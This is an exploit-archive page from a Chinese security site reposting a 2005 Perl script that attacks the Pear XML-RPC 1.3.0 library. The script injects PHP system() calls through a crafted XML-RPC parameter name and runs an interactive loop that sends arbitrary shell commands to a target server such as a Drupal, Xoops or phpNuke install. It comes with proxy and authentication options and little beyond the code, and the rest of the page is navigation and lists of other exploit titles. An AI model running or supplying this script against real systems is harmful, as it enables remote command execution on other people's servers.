首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Pear XML-RPC Library 1.3.0 Remote PHP Code Execution Exploit
来源:http://www.reversing.org 作者:James 发布时间:2005-07-04  

Pear XML-RPC Library 1.3.0 Remote PHP Code Execution Exploit


#!/usr/bin/perl
#
# ilo--
#
# This program is no GPL or has nothing to do with FSF, but some
# code was ripped from romansoft.. sorry, too lazy!
#
# xmlrpc bug by James from GulfTech Security Research.
# http://pear.php.net/bugs/bug.php?id=4692
# xmlrpc drupal exploit, but James sais xoops, phpnuke and other
# cms should be vulnerable.
#
# greets: !dSR digitalsec.net
#
require LWP::UserAgent;
use URI;
use Getopt::Long;
use strict;
$| = 1; # fflush stdout after print

# Default options
# connection
my $basic_auth_user = '';
my $basic_auth_pass = '';
my $proxy = '';
my $proxy_user = '';
my $proxy_pass = '';
my $conn_timeout = 15;

# general
my $host;

#informational lines to feed my own ego.
print "xmlrpc exploit - http://www.reversing.org \n";
print "2005 ilo-- <ilo".chr(64)."reversing.org> \n";
print "special chars allowed are / and - \n\n";

# read command line options
my $options = GetOptions (

#general options
'host=s' => \$host, # input host to test.

# connection options
'basic_auth_user=s' => \$basic_auth_user,
'basic_auth_pass=s' => \$basic_auth_pass,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'timeout=i' => \$conn_timeout);

# command line sanity check
&show_usage unless ($host);

# main loop
while (1){
print "\nxmlrpc@# ";
my $cmd = <STDIN>;
xmlrpc_xploit ($cmd);
}

exit (1);

#exploit
sub xmlrpc_xploit {
chomp (my $data = shift);
my $reply;

my $d1 = "<?xml version=\"1.0\"?><methodCall><methodName>examples.getStateName</methodName><params><param><name>a');";
my $d2 = ";//</name><value>xml exploit R/01</value></param></params></methodCall>";

$data =~ s/-/'.chr(45).'/mg;
$data =~ s/\//'.char(47).'/mg;

my $req = new HTTP::Request 'POST' => $host;
$req->content_type('application/xml');
$req->content($d1.'system(\''.$data.'\')'.$d2);

my $ua = new LWP::UserAgent;
$ua->agent("xmlrpc exploit R/0.1");
$ua->timeout($conn_timeout);

if ($basic_auth_user){
$req->authorization_basic($basic_auth_user, $basic_auth_pass)
}
if ($proxy){
$ua->proxy(['http'] => $proxy);
$req->proxy_authorization_basic($proxy_user, $proxy_pass);
}

#send request, return null if not OK
my $res = $ua->request($req);
if ($res->is_success){
$reply= $res->content;
} else {
$reply = "";
}
$reply =~ /(.*).(<pre>warning.*)/mgsi;
print ($1);
}

# show options
sub show_usage {
print "Syntax: ./xmlrpc.pl [options] host/uri\n\n";
print "main options\n";
print "connection options\n";
print "\t--proxy (http), --proxy_user, --proxy_pass\n";
print "\t--basic_auth_user, --basic_auth_pass\n";
print "\t--timeout \n";
print "\nExample\n";
print "bash# xmlrpc.pl --host=http://www.host.com/xmlrpc.php \n";
print "\n";
exit(1);
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WordPress 1.5.1.2 XMLRPC Modul
·Xoops <= 2.0.11 XMLRPC Modu
·phpBB 2.0.15 viewtopic.php Rem
·phpBB <= 2.0.15 Remote SQL
·Windows SMB客户端Transaction响
·Sudo <= 1.6.8p8 Pathname Va
·Microsoft Message Queuing Remo
·Mozilla FireFox <= 1.0.1 GI
·Stream/raped DoS
·Internet Download Manager URL
·TCP-IP Datalook DoS Vulnerabil
·TCP Chat(TCPX) DoS
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved